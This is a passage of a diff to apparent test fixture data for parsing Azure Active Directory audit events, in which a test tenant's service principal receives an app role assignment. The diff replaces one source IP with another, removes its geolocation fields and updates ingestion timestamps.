nvironment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -6104,25 +5564,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -6136,7 +5578,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -6272,7 +5714,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -6284,12 +5726,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036256800Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125008800Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -6315,25 +5757,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -6347,7 +5771,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -6483,7 +5907,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -6495,12 +5919,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036262700Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125014300Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 